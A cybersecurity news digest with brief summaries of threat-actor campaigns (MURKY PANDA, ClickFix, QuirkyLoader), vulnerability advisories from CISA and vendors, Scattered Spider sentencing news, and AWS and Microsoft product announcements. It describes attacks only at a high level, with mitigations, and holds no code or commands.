Murky Panda Intrusions, ClickFix Attacks, and KEV Updates

MURKY PANDA: Trusted-Relationship Cloud Threats and TTPs

🔒 Since late 2024 CrowdStrike's Counter Adversary Operations has tracked MURKY PANDA, a China‑nexus actor targeting government, technology, academic, legal and professional services in North America. The group exploits internet‑facing appliances, rapidly weaponizes n‑day and zero‑day flaws, and deploys web shells (including Neo‑reGeorg) and the Golang RAT CloudedHope. CrowdStrike recommends auditing Entra ID service principals and activity, enabling Microsoft Graph logging, hunting for anomalous service principal sign‑ins, prioritizing patching of cloud and edge devices, and leveraging Falcon detection and SIEM capabilities.

Russian State-Backed Static Tundra Exploits Cisco Devices

🧭 The author opens with a travel anecdote and practical reminders on securing devices while on the road, urging readers to update, back up, and avoid public charging or untrusted Wi‑Fi. The newsletter highlights field-tested precautions including disabling auto-connect, using VPNs or phone hotspots, enabling device tracking, and carrying power banks. It also warns of an active campaign by a Russian state-backed group targeting Cisco devices via CVE-2018-0171, urging immediate patching and hardening.

Pre-auth Exploit Chains Found in Commvault Releases

🔒 Commvault has released fixes for four vulnerabilities in versions prior to 11.36.60 that could enable unauthenticated attackers to achieve remote code execution. The flaws include an unauthenticated API access bug, a setup-time default credential exposure, a path traversal allowing filesystem access, and command-line argument injection that can elevate low-privilege sessions. Patches are available in 11.32.102 and 11.36.60; Commvault SaaS is not affected.

Analyzing ClickFix: A Rising Click-to-Execute Threat

🛡️ Microsoft Threat Intelligence and Microsoft Defender Experts describe the ClickFix social engineering technique, where attackers trick users into copying and pasting commands that execute malicious payloads. Observed since early 2024 and active through 2025, these campaigns deliver infostealers, RATs, loaders, and rootkits that target Windows and macOS devices. Lures arrive via phishing, malvertising, and compromised sites and often impersonate legitimate services or CAPTCHA verifications. Organizations should rely on user education, device hardening, and Microsoft Defender XDR layered protections to detect and block ClickFix activity.

ClickFix Campaign Delivers CORNFLAKE.V3 Backdoor via Web

🛡️ Mandiant observed a campaign using the ClickFix social‑engineering lure to trick victims into copying and running PowerShell commands via the Windows Run dialog, yielding initial access tracked as UNC5518. That access is monetized and used by other groups to deploy a versatile backdoor, CORNFLAKE.V3, in PHP and JavaScript forms. CORNFLAKE.V3 supports HTTP-based payload execution, Cloudflare-tunneled proxying and registry persistence; researchers recommend disabling Run where possible, tightening PowerShell policies and increasing logging and user training to mitigate the risk.

Weak Passwords Fuel Rise in Compromised Accounts in 2025

🔐 The Picus Blue Report 2025 finds that password cracking succeeded in 46% of tested environments, while Valid Accounts (T1078) exploitation achieved a 98% success rate. Many organizations still rely on weak passwords, outdated hashing, and lax internal controls, leaving credential stores exposed. The report urges adoption of widespread MFA, stronger password policies, routine credential-validation simulations, and improved behavioral detection to reduce undetected lateral movement and data theft.

Threat Actors Abuse SDKs to Sell Victim Bandwidth Stealthily

🔍 Unit 42 observed a campaign exploiting CVE-2024-36401 in GeoServer to remotely deploy legitimate SDKs or apps that sell victims' internet bandwidth. The attackers leverage JXPath evaluation to achieve RCE across multiple GeoServer endpoints, then install lightweight binaries that operate quietly to monetize unused network capacity. This approach often uses unmodified vendor SDKs to maximize stealth and persistence while avoiding traditional malware indicators.

Microsoft restricts Chinese firms' early MAPP exploit access

🔒 Microsoft has restricted distribution of proof-of-concept exploit code to MAPP participants in countries where firms must report vulnerabilities to their governments, including China. Affected companies will receive a more general written description issued at the same time as patches rather than PoC code, Microsoft said. The change follows the late-July SharePoint zero-day attacks and concerns about a possible leak from the early-bug-notification program.

QuirkyLoader Deploys Agent Tesla, AsyncRAT and Keyloggers

🛡️ Researchers disclosed a new .NET-based DLL loader named QuirkyLoader that's been used since November 2024 to deliver information stealers, keyloggers and RATs via email spam. IBM X-Force says attackers send malicious archives from both legitimate providers and self-hosted servers; each archive contains a DLL, an encrypted payload and a real executable used for DLL side-loading. The loader uses process hollowing to inject decrypted payloads into AddInProcess32.exe, InstallUtil.exe or aspnet_wp.exe. Operators compile the .NET DLL with ahead-of-time (AOT) compilation so the resulting binary resembles native C/C++ code and is harder to attribute.

CISA Adds Apple iOS/iPadOS/macOS KEV: CVE-2025-43300

⚠️ CISA added CVE-2025-43300 to its Known Exploited Vulnerabilities (KEV) Catalog, identifying an out‑of‑bounds write in Apple iOS, iPadOS, and macOS that the agency says is under active exploitation. Under BOD 22-01, Federal Civilian Executive Branch agencies must remediate KEV entries by established deadlines, and CISA strongly urges all organizations to prioritize timely patching and mitigation. This vulnerability reflects a common and high-risk memory-corruption vector that can enable code execution or other severe impacts if exploited. CISA will continue to update the KEV Catalog as new evidence of exploitation emerges.

SIM-Swapper Scattered Spider Hacker Sentenced 10 Years

🔒 A 20-year-old Florida man, Noah Michael Urban, was sentenced to 10 years in federal prison and ordered to pay about $13 million in restitution after pleading guilty to wire fraud and conspiracy. Prosecutors say Urban acted with members of Scattered Spider, using SIM-swapping and SMS phishing to divert calls and one-time codes and to phish employees into fake Okta pages. The campaign compromised access at more than 130 firms and enabled thefts of proprietary data and millions in cryptocurrency.

CISA Releases Three Industrial Control Systems Advisories

🔔 CISA released three Industrial Control Systems (ICS) advisories on August 21, 2025, detailing vulnerabilities and potential exploits affecting products from Mitsubishi Electric and FUJIFILM. The notices cover MELSEC iQ-F Series CPU Module, Mitsubishi Electric air conditioning systems (Update A), and Synapse Mobility. Each advisory includes technical details and recommended mitigations. CISA urges administrators and asset owners to review and apply the guidance promptly.

Phishing Campaign Targets Ledger Users with Fake Update

🔒 A sophisticated phishing campaign impersonating Ledger targets Nano X and Nano S Plus users with an urgent fake firmware update notice. The email claims fragments of private keys were leaked and urges immediate action, but the sender and update domains are not affiliated with Ledger. A professionally designed scam site hosted on an unrelated domain uses a support chat to coax victims into entering their seed phrase, which grants full wallet access. Organizations and individuals should treat unsolicited firmware alerts cautiously and use trained security controls and awareness to avoid compromise.

Scattered Spider Member Sentenced to 10 Years in US

🔒 Noah Michael Urban, a 20-year-old member of the Scattered Spider cybercrime gang, was sentenced to 120 months in federal prison after pleading guilty to wire fraud and aggravated identity theft in April 2025. The court also ordered $13 million in restitution and three years of supervised release; Urban called the sentence unjust. Prosecutors say Urban and co-conspirators used SIM swapping and social engineering between August 2022 and March 2023 to steal at least $800,000 and hijack cryptocurrency accounts. His case is part of broader DoJ actions against Scattered Spider as the group forges alliances with other criminal collectives.

AWS Security Incident Response Adds ITSM Integrations

🛡️ AWS Security Incident Response now integrates with popular ITSM platforms like Jira and ServiceNow, offering bidirectional synchronization for issues, comments, attachments, and case updates. The connectors are provided as open-source projects on GitHub with sample code, deployment instructions, and implementation best practices. A modular design and technical documentation make it straightforward to extend support to additional ITSM targets and to leverage AI assistants for rapid customization.

Amazon Verified Permissions adds Cedar 4.5 support

🔒 Amazon Verified Permissions now supports Cedar 4.5, introducing the new is operator to enable type-based access checks. Developers can write policies that grant or deny access based on a resource’s declared type—for example, allowing administrators to view a resource only when it is an invoice in a petstore app. The update enhances Cedar’s type system, helps catch type-related errors earlier in policy development, and is available in all AWS Regions where the service runs; new and backward-compatible accounts have been automatically upgraded.

AWS Neuron SDK 2.25: Inference and Monitoring Enhancements

🚀 AWS has released Neuron SDK 2.25.0, now generally available for Inferentia and Trainium instances, adding context and data parallelism support plus chunked attention to accelerate long-sequence inference. The update enhances neuron-ls and neuron-monitor APIs to show node affinities and device utilization, and introduces automatic aliasing (Beta) and disaggregated serving improvements (Beta). Upgraded AMIs and Deep Learning Containers are provided for inference and training.

AWS VPC IPAM Console Adds CloudWatch Alarm Management

🔔 Amazon Web Services has enhanced Amazon VPC IP Address Manager (IPAM) with deeper Amazon CloudWatch alarm integration, bringing alarm visibility and management directly into the IPAM console. Alarms are now visible across IPAM pages and a new resource-level Alarms tab lists alerts associated with specific IPAM resources. You can create alarms from the console (which redirects to CloudWatch with relevant fields pre-populated) and receive proactive monitoring suggestions for resources without alarms. The feature is available in all Regions where IPAM is supported, including AWS China and AWS GovCloud (US).

CloudWatch adds regional support for natural language queries

🔍 Amazon CloudWatch Logs Insights now extends its natural language query result summarization to 15 additional AWS Regions, delivering AI-generated, concise descriptions of query outputs to speed troubleshooting. Additionally, natural language query generation is available in six more Regions for CloudWatch Logs Insights and Metrics Insights, while PPL and SQL query generation has been added in three Regions. These features let users express intent in plain English to produce queries and receive readable summaries without deep query-language expertise, reducing time to actionable insight.

CloudGuard WAFaaS Now Available on AWS Marketplace

🔒 CloudGuard WAF-as-a-Service is now available on the AWS Marketplace and verified as Deployed on AWS. This pay-as-you-go service simplifies web application and API protection for AWS customers and reduces procurement friction. The offering has been recognized in the Gartner Market Guide for WAAP and named a Leader in the GigaOm Radar. Independent testing reported a 99.4% threat detection rate and 0.81% false positives, underscoring strong efficacy with low noise.

Mitsubishi MELSEC iQ-F CPU Module Denial-of-Service

🔒 CISA published Advisory ICSA-25-233-01 on August 21, 2025 describing a Denial-of-Service vulnerability (CVE-2025-5514, CVSS v3 5.3) in the Mitsubishi Electric MELSEC iQ-F Series CPU module web server. An attacker can send specially crafted HTTP requests that exploit an Improper Handling of Length Parameter Inconsistency to delay processing and prevent legitimate users from accessing the web server. Mitsubishi Electric reports no plans to release a fix and advises customers to restrict network exposure, use IP filtering and VPNs, and limit physical access. CISA recommends isolating control networks behind firewalls and minimizing internet exposure.

FUJIFILM Synapse Mobility Privilege Escalation Advisory

🔒 FUJIFILM Healthcare Americas Corporation has released fixes for a privilege-escalation vulnerability (CVE-2025-54551) affecting Synapse Mobility. The issue is an external control of an assumed-immutable web parameter that can be abused remotely with low attack complexity; CVSS v4 score is 5.3. FUJIFILM recommends upgrading to 8.2 or applying patches for 8.0–8.1.1. Immediate mitigations include disabling the configurator search function or unchecking "Allow plain text accession number," and CISA advises minimizing network exposure and using secure remote access.

AWS IoT Core Adds Customer-Managed KMS Keys Support

🔐 AWS IoT Core now supports customer-managed keys (CMK) via AWS KMS, enabling encryption of data stored in IoT Core with customer-controlled keys. When CMK is selected, AWS automatically re-encrypts existing stored data and manages the transition to avoid operational disruption. The feature is available in all Regions where IoT Core is supported and enhances control over key lifecycle — creation, rotation, monitoring, and deletion.

AWS Incident Response Achieves HITRUST CSF Certification

🔒 AWS Security Incident Response is now HITRUST CSF certified, demonstrating alignment with rigorous security and privacy controls used by healthcare, life sciences, and other regulated sectors. The certification confirms that organizations can leverage AWS Security Incident Response to automate alert monitoring, streamline incident coordination, and access 24/7 security experts. Customers can inherit AWS HITRUST scores to reduce audit burden and integrate via console, CLI, or APIs.

Microsoft Named Leader in 2025 Gartner Magic Quadrant

🚀 Microsoft has been named a Leader in the 2025 Gartner Magic Quadrant for Cloud-Native Application Platforms and is positioned furthest to the right in Completeness of Vision. The announcement highlights a developer-first approach across containers, functions, APIs, and web frameworks, with integrated tools such as GitHub Copilot and Visual Studio. Azure emphasizes AI-native capabilities through Azure AI Foundry and platform innovations designed to accelerate agentic applications for enterprise scenarios.

Sanborn Auctions Kryptos Part Four Solution at RR Auction

🔐 Jim Sanborn is auctioning the original solution to Part Four (K4) of his Kryptos sculpture, with RR Auction estimating a winning bid of $300,000–$500,000 for the lot. The sale, scheduled for Nov. 20, includes the handwritten plaintext, related papers, and a 12-by-18-inch copper proof-of-concept plate with 1,800 hand-cut letters. Sanborn hopes the buyer will preserve the secret and assume verification duties, potentially by implementing an automated review process.

Debunking Cyberbullying Myths: What Parents Should Know

🔍 This article debunks ten common cyberbullying myths that can mislead parents and educators. It cites rising rates of online harassment among US middle- and high-school students and explains why beliefs such as “what happens online stays online” or “remove the tech and you solve it” are false. The piece urges open dialogue, vigilance for behavioral signs, and collaborative plans to support children.